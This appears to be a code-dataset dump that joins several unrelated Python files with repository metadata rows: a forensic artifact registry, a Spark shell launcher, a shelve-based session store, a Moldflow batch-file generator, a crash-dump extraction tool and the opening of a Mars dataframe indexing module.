def GetArtifact(self, name):
"""Get artifact by name.
Args:
name: artifact name string.
Returns:
artifact object.
Raises:
ArtifactNotRegisteredError: if artifact doesn't exist in the registry.
"""
self._CheckDirty()
result = self._artifacts.get(name)
if not result:
raise rdf_artifacts.ArtifactNotRegisteredError(
"Artifact %s missing from registry. You may need to sync the "
"artifact repo by running make in the artifact directory." % name)
return result
@utils.Synchronized
def GetArtifactNames(self, *args, **kwargs):
return set([a.name for a in self.GetArtifacts(*args, **kwargs)])
@utils.Synchronized
def SearchDependencies(self,
os_name,
artifact_name_list,
existing_artifact_deps=None,
existing_expansion_deps=None):
"""Return a set of artifact names needed to fulfill dependencies.
Search the path dependency tree for all artifacts that can fulfill
dependencies of artifact_name_list. If multiple artifacts provide a
dependency, they are all included.
Args:
os_name: operating system string
artifact_name_list: list of artifact names to find dependencies for.
existing_artifact_deps: existing dependencies to add to, for recursion,
e.g. set(["WindowsRegistryProfiles", "WindowsEnvironmentVariablePath"])
existing_expansion_deps: existing expansion dependencies to add to, for
recursion, e.g. set(["users.userprofile", "users.homedir"])
Returns:
(artifact_names, expansion_names): a tuple of sets, one with artifact
names, the other expansion names
"""
artifact_deps = existing_artifact_deps or set()
expansion_deps = existing_expansion_deps or set()
artifact_objs = self.GetArtifacts(
os_name=os_name, name_list=artifact_name_list)
artifact_deps = artifact_deps.union([a.name for a in artifact_objs])
for artifact in artifact_objs:
expansions = GetArtifactPathDependencies(artifact)
if expansions:
expansion_deps = expansion_deps.union(set(expansions))
# Get the names of the artifacts that provide those expansions
new_artifact_names = self.GetArtifactNames(
os_name=os_name, provides=expansions)
missing_artifacts = new_artifact_names - artifact_deps
if missing_artifacts:
# Add those artifacts and any child dependencies
new_artifacts, new_expansions = self.SearchDependencies(
os_name,
new_artifact_names,
existing_artifact_deps=artifact_deps,
existing_expansion_deps=expansion_deps)
artifact_deps = artifact_deps.union(new_artifacts)
expansion_deps = expansion_deps.union(new_expansions)
return artifact_deps, expansion_deps
@utils.Synchronized
def DumpArtifactsToYaml(self, sort_by_os=True):
"""Dump a list of artifacts into a yaml string."""
artifact_list = self.GetArtifacts()
if sort_by_os:
      # Sort so it's easier to split these if necessary.
yaml_list = []
for os_name in rdf_artifacts.Artifact.SUPPORTED_OS_LIST:
done = {a.name: a for a in artifact_list if a.supported_os == [os_name]}
# Separate into knowledge_base and non-kb for easier sorting.
done_sorted = list(sorted(done.values(), key=lambda x: x.name))
yaml_list.extend(x.ToYaml() for x in done_sorted if x.provides)
yaml_list.extend(x.ToYaml() for x in done_sorted if not x.provides)
artifact_list = [a for a in artifact_list if a.name not in done]
yaml_list.extend(x.ToYaml() for x in artifact_list) # The rest.
else:
yaml_list = [x.ToYaml() for x in artifact_list]
return "---\n\n".join(yaml_list)
REGISTRY = ArtifactRegistry()
def DeleteArtifactsFromDatastore(artifact_names, reload_artifacts=True):
"""Deletes a list of artifacts from the data store."""
artifacts_list = REGISTRY.GetArtifacts(
reload_datastore_artifacts=reload_artifacts)
to_delete = set(artifact_names)
deps = set()
for artifact_obj in artifacts_list:
if artifact_obj.name in to_delete:
continue
if GetArtifactDependencies(artifact_obj) & to_delete:
deps.add(str(artifact_obj.name))
if deps:
raise ValueError(
"Artifact(s) %s depend(s) on one of the artifacts to delete." %
(",".join(deps)))
found_artifact_names = set()
for artifact_value in artifacts_list:
if artifact_value.name in to_delete:
found_artifact_names.add(artifact_value.name)
if len(found_artifact_names) != len(to_delete):
not_found = to_delete - found_artifact_names
raise ValueError("Artifact(s) to delete (%s) not found." %
",".join(not_found))
for artifact_name in to_delete:
data_store.REL_DB.DeleteArtifact(str(artifact_name))
REGISTRY.UnregisterArtifact(artifact_name)
def ValidateSyntax(rdf_artifact):
"""Validates artifact syntax.
This method can be used to validate individual artifacts as they are loaded,
without needing all artifacts to be loaded first, as for Validate().
Args:
rdf_artifact: RDF object artifact.
Raises:
ArtifactSyntaxError: If artifact syntax is invalid.
"""
if not rdf_artifact.doc:
raise rdf_artifacts.ArtifactSyntaxError(rdf_artifact, "missing doc")
for supp_os in rdf_artifact.supported_os:
valid_os = rdf_artifact.SUPPORTED_OS_LIST
if supp_os not in valid_os:
detail = "invalid `supported_os` ('%s' not in %s)" % (supp_os, valid_os)
raise rdf_artifacts.ArtifactSyntaxError(rdf_artifact, detail)
for condition in rdf_artifact.conditions:
# FIXME(hanuszczak): It does not look like the code below can throw
# `ConditionException`. Do we really need it then?
try:
of = objectfilter.Parser(condition).Parse()
of.Compile(objectfilter.BaseFilterImplementation)
except rdf_artifacts.ConditionError as e:
detail = "invalid condition '%s'" % condition
raise rdf_artifacts.ArtifactSyntaxError(rdf_artifact, detail, e)
# Anything listed in provides must be defined in the KnowledgeBase
valid_provides = rdf_client.KnowledgeBase().GetKbFieldNames()
for kb_var in rdf_artifact.provides:
if kb_var not in valid_provides:
detail = "broken `provides` ('%s' not in %s)" % (kb_var, valid_provides)
raise rdf_artifacts.ArtifactSyntaxError(rdf_artifact, detail)
# Any %%blah%% path dependencies must be defined in the KnowledgeBase
for dep in GetArtifactPathDependencies(rdf_artifact):
if dep not in valid_provides:
detail = "broken path dependencies ('%s' not in %s)" % (dep,
valid_provides)
raise rdf_artifacts.ArtifactSyntaxError(rdf_artifact, detail)
for source in rdf_artifact.sources:
try:
source.Validate()
except rdf_artifacts.ArtifactSourceSyntaxError as e:
raise rdf_artifacts.ArtifactSyntaxError(rdf_artifact, "bad source", e)
def ValidateDependencies(rdf_artifact):
"""Validates artifact dependencies.
This method checks whether all dependencies of the artifact are present
and contain no errors.
This method can be called only after all other artifacts have been loaded.
Args:
rdf_artifact: RDF object artifact.
Raises:
ArtifactDependencyError: If a dependency is missing or contains errors.
"""
for dependency in GetArtifactDependencies(rdf_artifact):
try:
dependency_obj = REGISTRY.GetArtifact(dependency)
except rdf_artifacts.ArtifactNotRegisteredError as e:
raise rdf_artifacts.ArtifactDependencyError(
rdf_artifact, "missing dependency", cause=e)
message = dependency_obj.error_message
if message:
raise rdf_artifacts.ArtifactDependencyError(
rdf_artifact, "dependency error", cause=message)
def Validate(rdf_artifact):
"""Attempts to validate the artifact has been well defined.
This checks both syntax and dependencies of the artifact. Because of that,
this method can be called only after all other artifacts have been loaded.
Args:
rdf_artifact: RDF object artifact.
Raises:
ArtifactDefinitionError: If artifact is invalid.
"""
ValidateSyntax(rdf_artifact)
ValidateDependencies(rdf_artifact)
def GetArtifactDependencies(rdf_artifact, recursive=False, depth=1):
"""Return a set of artifact dependencies.
Args:
rdf_artifact: RDF object artifact.
recursive: If True recurse into dependencies to find their dependencies.
depth: Used for limiting recursion depth.
Returns:
A set of strings containing the dependent artifact names.
Raises:
RuntimeError: If maximum recursion depth reached.
"""
deps = set()
for source in rdf_artifact.sources:
# ARTIFACT is the legacy name for ARTIFACT_GROUP
# per: https://github.com/ForensicArtifacts/artifacts/pull/143
# TODO(user): remove legacy support after migration.
if source.type in (rdf_artifacts.ArtifactSource.SourceType.ARTIFACT,
rdf_artifacts.ArtifactSource.SourceType.ARTIFACT_GROUP):
if source.attributes.GetItem("names"):
deps.update(source.attributes.GetItem("names"))
if depth > 10:
raise RuntimeError("Max artifact recursion depth reached.")
deps_set = set(deps)
if recursive:
for dep in deps:
artifact_obj = REGISTRY.GetArtifact(dep)
new_dep = GetArtifactDependencies(artifact_obj, True, depth=depth + 1)
if new_dep:
deps_set.update(new_dep)
return deps_set
# TODO(user): Add tests for this and for all other Get* functions in this
# package.
def GetArtifactsDependenciesClosure(name_list, os_name=None):
"""For all the artifacts in the list returns them and their dependencies."""
artifacts = {
a.name: a
for a in REGISTRY.GetArtifacts(os_name=os_name, name_list=name_list)
}
dep_names = set()
for art in artifacts.values():
dep_names.update(GetArtifactDependencies(art, recursive=True))
if dep_names:
for dep in REGISTRY.GetArtifacts(os_name=os_name, name_list=dep_names):
artifacts[dep.name] = dep
return list(artifacts.values())
def GetArtifactPathDependencies(rdf_artifact):
"""Return a set of knowledgebase path dependencies.
Args:
rdf_artifact: RDF artifact object.
Returns:
A set of strings for the required kb objects e.g.
["users.appdata", "systemroot"]
"""
deps = set()
for source in rdf_artifact.sources:
for arg, value in source.attributes.items():
paths = []
if arg in ["path", "query"]:
paths.append(value)
if arg == "key_value_pairs":
# This is a REGISTRY_VALUE {key:blah, value:blah} dict.
paths.extend([x["key"] for x in value])
if arg in ["keys", "paths", "path_list", "content_regex_list"]:
paths.extend(value)
for path in paths:
for match in artifact_utils.INTERPOLATED_REGEX.finditer(path):
deps.add(match.group()[2:-2]) # Strip off %%.
deps.update(GetArtifactParserDependencies(rdf_artifact))
return deps
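# Illustrative note (not part of the original module): for an artifact whose source has
# attributes {"paths": ["%%users.appdata%%\\Mozilla", "%%systemroot%%\\System32"]},
# the interpolation regex above would yield the dependency set
# {"users.appdata", "systemroot"}.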
def GetArtifactParserDependencies(rdf_artifact):
"""Return the set of knowledgebase path dependencies required by the parser.
Args:
rdf_artifact: RDF artifact object.
Returns:
A set of strings for the required kb objects e.g.
["users.appdata", "systemroot"]
"""
factory = parsers.ArtifactParserFactory(str(rdf_artifact.name))
deps = set()
for p in factory.AllParserTypes():
deps.update(p.knowledgebase_dependencies)
return deps
| 34.846479
| 80
| 0.697506
|
5df40bff61181c7c5b1000e9fc7b836034fe22ce
| 1,255
|
py
|
Python
|
sparklingpandas/shell/shell.py
|
michalmonselise/sparklingpandas
|
cf4136b5cd21a22e4e61d5da9aa15a72fc3d565c
|
[
"Apache-2.0"
] | 245
|
2015-02-24T02:49:06.000Z
|
2021-11-16T11:25:02.000Z
|
sparklingpandas/shell/shell.py
|
michalmonselise/sparklingpandas
|
cf4136b5cd21a22e4e61d5da9aa15a72fc3d565c
|
[
"Apache-2.0"
] | 78
|
2015-02-19T23:38:36.000Z
|
2017-11-09T11:47:35.000Z
|
sparklingpandas/shell/shell.py
|
sparklingpandas/sparklingpandas
|
7d549df4348c979042b683c355aa778fc6d3a768
|
[
"Apache-2.0"
] | 49
|
2015-02-19T21:56:17.000Z
|
2020-11-30T22:20:23.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
An interactive shell.
This file is designed to be launched by bin/pyspark
"""
import sparklingpandas
from sparklingpandas.pcontext import PSparkContext
from pyspark.sql import SQLContext, HiveContext
from pyspark import SparkContext
spark_ctx = SparkContext()
sqlCtx = SQLContext(spark_ctx)
hiveCtx = HiveContext(sqlCtx)
sqlContext = sqlCtx
from pyspark.sql import Row
psc = PSparkContext(spark_ctx, sqlCtx)
print("Sparkling Pandas context is available as psc\n")
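# Illustrative note (not part of the original shell script): once the shell is up, data
# would typically be loaded through `psc`, e.g. something like
#   df = psc.read_csv("data.csv")
# (the exact PSparkContext method name is an assumption here, not verified against its API).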
| 35.857143
| 74
| 0.787251
|
d4fb1e2284dbcabc1b50220b69770590a03680ae
| 3,713
|
py
|
Python
|
WebKit/SessionShelveStore.py
|
PeaceWorksTechnologySolutions/w4py
|
74f5a03a63f1a93563502b908474aefaae2abda2
|
[
"MIT"
] | null | null | null |
WebKit/SessionShelveStore.py
|
PeaceWorksTechnologySolutions/w4py
|
74f5a03a63f1a93563502b908474aefaae2abda2
|
[
"MIT"
] | null | null | null |
WebKit/SessionShelveStore.py
|
PeaceWorksTechnologySolutions/w4py
|
74f5a03a63f1a93563502b908474aefaae2abda2
|
[
"MIT"
] | null | null | null |
"""Session store using the shelve module."""
import os
import shelve
import threading
from MiscUtils import NoDefault
from SessionStore import maxPickleProtocol, SessionStore
class SessionShelveStore(SessionStore):
"""A session store implemented with a shelve object.
To use this store, set SessionStore in Application.config to 'Shelve'.
"""
_filename = 'Session.Store'
## Init ##
def __init__(self, app, restoreFiles=True, filename=None):
"""Initialize the session shelf.
If restoreFiles is true, existing shelve file(s) will be reused.
"""
SessionStore.__init__(self, app)
filename = os.path.join(app._sessionDir, filename or self._filename)
flag = 'c' if restoreFiles else 'n'
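        # shelve/dbm flag semantics: 'c' opens an existing shelf or creates one if missing,
        # while 'n' always creates a new, empty shelf, discarding any previous contents.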
self._store = shelve.open(filename,
flag=flag, protocol=maxPickleProtocol)
self._lock = threading.RLock()
## Access ##
def __len__(self):
"""Return the number of sessions."""
return len(self._store)
def __getitem__(self, key):
"""Get a session item, reading it from the store."""
# multiple simultaneous read accesses are safe
return self._store[key]
def __setitem__(self, key, value):
"""Set a session item, writing it to the store."""
# concurrent write access is not supported
dirty = value.isDirty()
if self._alwaysSave or dirty:
with self._lock:
if dirty:
value.setDirty(False)
try:
self._store[key] = value
except Exception:
if dirty:
value.setDirty()
raise # raise original exception
def __delitem__(self, key):
"""Delete a session item from the store."""
with self._lock:
session = self[key]
if not session.isExpired():
session.expiring()
del self._store[key]
def __contains__(self, key):
"""Check whether the session store has a given key."""
return key in self._store
def __iter__(self):
"""Return an iterator over the stored session keys."""
return iter(self._store)
def keys(self):
"""Return a list with the keys of all the stored sessions."""
return self._store.keys()
def clear(self):
"""Clear the session store, removing all of its items."""
self._store.clear()
def setdefault(self, key, default=None):
"""Return value if key available, else default (also setting it)."""
with self._lock:
return self._store.setdefault(key, default)
def pop(self, key, default=NoDefault):
"""Return value if key available, else default (also remove key)."""
with self._lock:
if default is NoDefault:
return self._store.pop(key)
else:
return self._store.pop(key, default)
## Application support ##
def storeSession(self, session):
"""Save potentially changed session in the store."""
key = session.identifier()
if key not in self or self[key] is not session:
self[key] = session
def storeAllSessions(self):
"""Permanently save all sessions in the store.
Should be used (only) when the application server is shut down.
"""
self._store.close()
def cleanStaleSessions(self, task=None):
"""Clean stale sessions."""
SessionStore.cleanStaleSessions(self, task)
self.intervalSweep()
def intervalSweep(self):
"""The session sweeper interval function."""
self._store.sync()
| 30.434426
| 76
| 0.599246
|
bbc153fc5db07206ffa96e79908516821e381b82
| 8,785
|
py
|
Python
|
20210104tempdir/auto1k.py
|
lamdalamda/auto-moldflow
|
a067ed7fb4e39179a36016d813aa036bb41f77b6
|
[
"Apache-2.0"
] | null | null | null |
20210104tempdir/auto1k.py
|
lamdalamda/auto-moldflow
|
a067ed7fb4e39179a36016d813aa036bb41f77b6
|
[
"Apache-2.0"
] | null | null | null |
20210104tempdir/auto1k.py
|
lamdalamda/auto-moldflow
|
a067ed7fb4e39179a36016d813aa036bb41f77b6
|
[
"Apache-2.0"
] | null | null | null |
import itertools
import os
class csv(object):#extract information from csv
def __init__(self,filename="1200hf.csv"):
self.lines=open(filename,"r").readlines()
self.attributes=self.lines[0].split(",")
self.attributes[-1]=self.attributes[-1].replace("\n","")
self.datalines=self.lines[1:]
self.listdata=[]
self.attrdata={}
        self.columns=len(self.attributes) # number of columns, i.e. the number of attributes
for i in self.attributes:
self.attrdata[i]=[]
for i in self.datalines:
thisline=[]
ii=i.split(",")
for j in range(0,len(ii)):
thisline.append(ii[j].replace("\n",""))
self.attrdata[self.attributes[j]].append(ii[j])
self.listdata.append(thisline)
        self.rows=len(self.listdata)# number of data rows, excluding the header row
def debug(self):
print(self.attrdata)
print(self.listdata)
input("debug")
def createdummy(self,dummyname="dummy",value="0"):
self.attrdata[dummyname]=[]
for i in range (0,self.rows):
self.attrdata[dummyname].append(value)
#debug pass 20201027
    def generate_dicts(self,subtractlist=["melt_temp","mold_temp","flow_rate_r","dummy","pack_press","pack_time","pack_press","cool_time"],totheattrlist=["melt_temperature","mold_temperature","flow_rate","pack_start","pack_initial_pressure","pack_stop","pack_end_pressure","cool_time"]):#build the dictionary list from the csv; the subtractlist columns produce the totheattrlist keys
self.generatedDicts=[]
for i in range (0,len(self.attrdata["melt_temp"])):
l={}
for j in range(0,len(subtractlist)):
l[totheattrlist[j]]=self.attrdata[subtractlist[j]][i].replace("\n","")
self.generatedDicts.append(l)
#print(generatedDicts)#debug pass
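# Illustrative sketch (not part of the original script): judging from the default
# subtractlist above, the input CSV header would look roughly like
#   melt_temp,mold_temp,flow_rate_r,pack_press,pack_time,cool_time
# with one process setting per row; the "dummy" column is added by createdummy()
# rather than read from the file.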
example_replace_dictionary_IM={"melt_temperature":1,"mold_temperature":2,"flow_rate":3,"pack_start":4,"pack_initial_pressure":5,"pack_stop":6,"pack_end_pressure":7,"cool_time":8}
class changexml(object):
def __init__(self,filenamepre="1",filename="IMxml.xml",studyname="IMxml.xml",replace_dict=example_replace_dictionary_IM):
self.lines=open(filename,"r").readlines()
self.newxml=open("./temp/"+str(filenamepre)+studyname,"w+")
for i in self.lines:
for j in replace_dict:
if j in i:
i=i.replace(j,str(replace_dict[j]))
print(i)
self.newxml.write(i)
def alphatest(filename="1200hf.csv",xmlname="IMxml.xml"): #alphatest for 1200hf.csv Pass
#alphatest workflow
try:
os.mkdir("temp")
except FileExistsError:
print("temp folder exist,continue")
k=csv(filename)
k.createdummy()
subtractlist=["melt_temp","mold_temp","flow_rate_r","dummy","pack_press","pack_time","pack_press","cool_time"]
totheattrlist=["melt_temperature","mold_temperature","flow_rate","pack_start","pack_initial_pressure","pack_stop","pack_end_pressure","cool_time"]
k.generate_dicts(subtractlist,totheattrlist)
kxmllist=[]
for i in range (0,len(k.generatedDicts)):
h=changexml(i,xmlname,filename+".xml",k.generatedDicts[i])
kxmllist.append(str(i)+filename+".xml")
m=studymod(kxmllist)
studys=m.generatebat()
r=runstudy(studys)
r.generatebat()
g=studyrlt(studys)
g.generatecommands()
g.generatebat()
mpis=generatempi(studys)
mpis.generate()
'''
class tcode(object):# trial of building the xml from scratch. Abandoned
def __init__(self,father_node=0,codeid=10707,codevalue=[0,18900000,14,18900000],codename=None):
tcode_node=domTree.createElement("TCode")
id_node=domTree.createElement("ID")
id_codeid=domTree.createTextNode(codeid)
id_node.appendChild(id_codeid)
tcode_node.appendChild(id_node)
for i in codevalue:
value_node=domTree.createElement("Value")
Value_value=domTree.createElement(i)
value_node.appendChild(Value_value)
tcode_node.appendChild(value_node)
father_node.appendChild(tcode_node)
tcode reference
<TCode>
<ID>10707</ID>
<Value>0</Value>
<Value>18900000</Value>
<Value>14</Value>
<Value>18900000</Value>
'''
class studymod(object):
def __init__(self,xmlstudy=[],studyfile="crims.sdy",moldflowpath=r"C:\Program Files\Autodesk\Moldflow Insight 2019\bin"):
#xmlstudy=kxmlstudy for alphatest
super().__init__()
self.xmls=xmlstudy
self.studyfile=studyfile
self.studymodpath='"'+moldflowpath+'\\studymod"'
def generatebat(self):
self.studymodbat=open("./temp/studymod.bat","w+")
self.newstudys=[]
for i in range(0,len(self.xmls)):
self.studymodbat.write(self.studymodpath+" "+self.studyfile+" "+self.xmls[i]+".sdy "+self.xmls[i]+"\n")
self.newstudys.append(self.xmls[i]+".sdy")
self.studymodbat.close()
        return self.newstudys# names of all generated study files, as a list
class runstudy(object):
def __init__(self,studys=[],command=" -temp temp -keeptmp ",moldflowpath=r"C:\Program Files\Autodesk\Moldflow Insight 2019\bin"):
#studys=studymod.newstudys for alphatest
super().__init__()
self.studys=studys
self.commands=command
self.runstudypath='"'+moldflowpath+'\\runstudy"'
def generatebat(self):
self.runstudybat=open("./temp/runstudy.bat","w+")
#self.newstudys=[]
for i in range(0,len(self.studys)):
self.runstudybat.write(self.runstudypath+self.commands+self.studys[i]+"\n")
#self.newstudys.append(self.xmls[i]+".sdy")
self.runstudybat.close()
        #return self.newstudys# names of all generated study files, as a list
class resultcommands(object):
def __init__(self,commanddict={" -result ":["6260"]," -node ":["128","124","27","23","126","79","74"]," -component ":["1","2"], " -unit metric":[" "]}):
self.cdict={}
for i in commanddict:
self.cdict[i]=[]
for j in commanddict[i]:
self.cdict[i].append(i+j)
self.clist=[]
for i in self.cdict:
self.clist.append(self.cdict[i])
self.commands=list(itertools.product(*tuple(self.clist)))
self.strcommands=[]
for i in self.commands:
self.strcommands.append("".join(i))
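# Illustrative note (not part of the original script): with the default commanddict above,
# each element of self.strcommands is one member of the cartesian product, e.g.
#   " -result 6260 -node 128 -component 1 -unit metric "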
class studyrlt(object):#under construct
def __init__(self,studys=[],commanddict={" -result ":["6260"]," -node ":["128","124","27","23","126","79","74"]," -component ":["1","2"], " -unit metric":[" "]},moldflowpath=r"C:\Program Files\Autodesk\Moldflow Insight 2019\bin"):
#studys=studymod.newstudys for alphatest
super().__init__()
self.studys=studys
#self.commands=command
self.studyrltpath='"'+moldflowpath+'\\studyrlt" '
self.commanddict=commanddict
def generatecommands(self):
self.cdict={}
for i in self.commanddict:
self.cdict[i]=[]
for j in self.commanddict[i]:
self.cdict[i].append(i+j)
self.clist=[]
for i in self.cdict:
self.clist.append(self.cdict[i])
self.commands=list(itertools.product(*tuple(self.clist)))
self.strcommands=[]
for i in self.commands:
self.strcommands.append("".join(i))
return self.strcommands
def generatebat(self):
self.studyrltbat=open("./temp/studyrlt.bat","w+")
#self.newstudys=[]
for i in range(0,len(self.strcommands)):
for j in self.studys:
self.studyrltbat.write(self.studyrltpath+j+self.strcommands[i]+"\nrename "+j[:-3]+'val '+j+self.strcommands[i].replace(" ","")+'.val\n')
#self.newstudys.append(self.xmls[i]+".sdy")
self.studyrltbat.close()
class generatempi(object):
def __init__(self,studys=[],mpifilename="crims result.mpi",projectname="auto1k"):
self.studys=studys
self.mpifilename=mpifilename
self.pretexts='VERSION 1.0\nBEGIN PROJECT "'+projectname+'"\n'
self.subtexts="END PROJECT\nORGANIZE 0\nBEGIN PROPERTIES\nEND PROPERTIES\nLast Write Time: Thu Dec 31 13:12:04 2020"
def generate(self):
self.mpifile=open("./temp/"+self.mpifilename,"w+")
self.mpifile.write(self.pretexts)
for i in self.studys:
self.mpifile.write('STUDY "'+i[0:5].replace(".","")+'" '+i+"\n")
self.mpifile.write(self.subtexts)
return
#main
if __name__=='__main__':
alphatest("LS2.csv","IMxml.xml")
'''
1200hf.csv is a set of CRIMS process settings; it can be changed.
'''
# with open
| 41.244131
| 351
| 0.620262
|
d3bd0ced37a22df3c016f6843152134d31f4b8f4
| 6,406
|
py
|
Python
|
tools/outtakes.py
|
grische/whatstyle
|
eff02bfa45a75019ad4e470085ff7c4da51cb5c4
|
[
"MIT"
] | 169
|
2016-06-21T16:43:06.000Z
|
2022-01-24T23:01:45.000Z
|
tools/outtakes.py
|
grische/whatstyle
|
eff02bfa45a75019ad4e470085ff7c4da51cb5c4
|
[
"MIT"
] | 9
|
2017-10-15T03:27:28.000Z
|
2022-01-16T22:12:28.000Z
|
tools/outtakes.py
|
grische/whatstyle
|
eff02bfa45a75019ad4e470085ff7c4da51cb5c4
|
[
"MIT"
] | 9
|
2016-08-24T18:27:27.000Z
|
2021-12-22T10:27:32.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This script extracts program crashes from a dump file that was recorded with:
# whatstyle.py --color on --keeptempfiles --debug popenio ...
# The "--color on" is necessary so that it can be distinguished if a space character
# separates two arguments or is part of the argument itself.
#
# Running 'outtakes.py < dump.txt' will create nested directories like
# outtakes/c_-4_396 that contain the returncode, standard input, output and error and
# possibly a configfile from the dump.
# It should be sufficient to enter one of these directories and call ./callfmt.sh
# to reproduce a crash.
from __future__ import print_function
import sys
if (((sys.version_info[0] == 2) and (sys.version_info[1] < 7)) or (
(sys.version_info[0] == 3) and (sys.version_info[1] < 2))):
sys.stderr.write('Error: Python 2.7 or when running on Python 3 at least Python 3.2'
' is required to run whatstyle\n')
sys.exit(1)
import argparse
import errno
import os
import re
import shutil
try:
from shlex import quote as shellquote
except ImportError:
from pipes import quote as shellquote
from collections import Counter
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY2:
text_type = unicode
binary_type = str
else:
text_type = str
binary_type = bytes
DESTDIR = 'outtakes'
HAS_FSCODEC = hasattr(os, 'fsdecode')
def unistr(text, errors='strict'):
if isinstance(text, text_type):
return text
try:
return text.decode('utf-8', errors=errors)
except UnicodeDecodeError:
if HAS_FSCODEC:
return os.fsdecode(text)
raise
def bytestr(text):
if isinstance(text, binary_type):
return text
try:
return text.encode('utf-8')
except UnicodeEncodeError:
if HAS_FSCODEC:
return os.fsencode(text)
raise
def rawstream(fp):
if PY3:
try:
return fp.buffer
except AttributeError:
# There might be a BytesIO behind fp.
pass
return fp
def write(s, fp=None):
"""Write s to the binary stream fp (default is stdout).
"""
efp = fp if fp is not None else sys.stdout
rawstream(efp).write(bytestr(s))
def outline(s=b'', end=b'\n', fp=None):
write(bytestr(s) + bytestr(end), fp=fp)
re_ansi = re.compile(br'\x1b\[(?:\d*(?:;\d+)*)m')
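# Illustrative note (not part of the original script): re_ansi matches ANSI SGR colour
# sequences such as b'\x1b[31m', b'\x1b[1;32m' or b'\x1b[0m'; splitting the dumped command
# line on these sequences is what recovers the individual argument boundaries below.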
def extract_outtakes(filename, maxpercode=0):
re_lengths = re.compile(br'debug_popen: len\(stdin\):(\d+) => returncode:(-?\d+)'
br' len\(stdout\):(\d+) len\(stderr\):(\d+)')
valid_retcodes = set(range(100))
retcounters = Counter()
with open(filename, 'rb') as fp:
count = 0
cfgfile = None
command = None
while True:
line = fp.readline()
if not line:
break
prefix = b'debug_popen: '
m = re_lengths.match(line)
if m:
lin, retcode, lout, lerr = [int(x) for x in m.groups()]
if retcode in valid_retcodes:
continue
if 1 <= maxpercode <= retcounters[retcode]:
continue
retcounters[retcode] += 1
otdir = os.path.join(DESTDIR, "c_%s_%s" % (str(retcode), str(count)))
try:
os.makedirs(otdir)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
if command:
fname = os.path.join(otdir, 'callfmt.sh')
with open(fname, 'wb') as cfg:
if lin > 0:
command = command + b' < stdin.txt'
cfg.write(command + b'\n')
os.chmod(fname, 0o755)
command = None
with open(os.path.join(otdir, 'retcode.txt'), 'wb') as cfg:
cfg.write(bytestr(str(retcode)) + b'\n')
if cfgfile:
shutil.copyfile(cfgfile, os.path.join(otdir, os.path.basename(cfgfile)))
cfgfile = None
for chan, chanlen in zip(['stdin', 'stdout', 'stderr'], [lin, lout, lerr]):
if chanlen == 0:
continue
line = fp.readline()
if line == b'debug_popenio: ' + bytestr(chan) + b':"""\\\n':
data = fp.read(chanlen)
with open(os.path.join(otdir, '%s.txt' % chan), 'wb') as cfp:
cfp.write(data)
fp.readline() # This should be """
elif line.startswith(prefix):
line = line[len(prefix):]
line = line.rstrip(b'\r\n')
args = re_ansi.split(line)
cmdargs = []
if len(args) > 1 and not args[0] and not args[-1]:
for idx, arg in enumerate(args[1:-1]):
if idx % 2 == 1:
if arg == b' ':
continue
else:
write(b"Unexpected debug_popen line: " + line, fp=sys.stderr)
uarg = arg.decode('raw-unicode-escape')
if idx > 0 and os.path.abspath(arg) and os.path.isfile(arg):
cfgfile = uarg
uarg = os.path.basename(uarg)
cmdargs.append(shellquote(uarg).encode('raw-unicode-escape'))
if cmdargs:
command = b' '.join(cmdargs)
count += 1
return 0
def main():
parser = argparse.ArgumentParser(description='Extract data from formatter crashes')
parser.add_argument('filename', help='input dump filename')
parser.add_argument('--maxpercode',
type=int,
default=-1,
help='only extract this many calls per returncode\n'
                             ' 0 or less means unlimited (default: -1)')
args = parser.parse_args()
if not args.filename:
parser.error('Please specify the input dump filename')
return extract_outtakes(args.filename, maxpercode=args.maxpercode)
if __name__ == '__main__':
sys.exit(main())
| 33.89418
| 93
| 0.52966
|
fb7ff00ae74fd29b817efd0d5c0238c9396a3962
| 38,694
|
py
|
Python
|
mars/dataframe/indexing/index_lib.py
|
ueshin/mars
|
0b542974243be4e0ff239eaf49ab0fb2935f3361
|
[
"Apache-2.0"
] | 1
|
2020-06-25T13:51:16.000Z
|
2020-06-25T13:51:16.000Z
|
mars/dataframe/indexing/index_lib.py
|
ueshin/mars
|
0b542974243be4e0ff239eaf49ab0fb2935f3361
|
[
"Apache-2.0"
] | null | null | null |
mars/dataframe/indexing/index_lib.py
|
ueshin/mars
|
0b542974243be4e0ff239eaf49ab0fb2935f3361
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
from collections import namedtuple
from typing import List, Union, Tuple
import numpy as np
import pandas as pd
from pandas.core.dtypes.cast import find_common_type
from ...core import TileableEntity, Chunk
from ...operands import OperandStage
from ...tiles import TilesError
from ...tensor.core import TENSOR_TYPE
from ...tensor.indexing.index_lib import IndexHandlerContext, IndexHandler, \
IndexInfo, IndexType, ChunkIndexInfo as ChunkIndexInfoBase, \
SliceIndexHandler as SliceIndexHandlerBase, \
NDArrayBoolIndexHandler as NDArrayBoolIndexHandlerBase, \
TensorBoolIndexHandler as TensorBoolIndexHandlerBase, \
IntegralIndexHandler, IndexesHandler
from ...tensor.utils import split_indexes_into_chunks, calc_pos, \
filter_inputs, slice_split, calc_sliced_size, to_numpy
from ...utils import check_chunks_unknown_shape, classproperty
from ..core import SERIES_CHUNK_TYPE, IndexValue
from ..operands import ObjectType
from ..utils import parse_index
from .utils import convert_labels_into_positions
ChunkIndexAxisInfo = namedtuple(
'chunk_index_axis_info',
['output_axis_index', 'processed_index', 'output_shape', 'index_value', 'dtypes'])
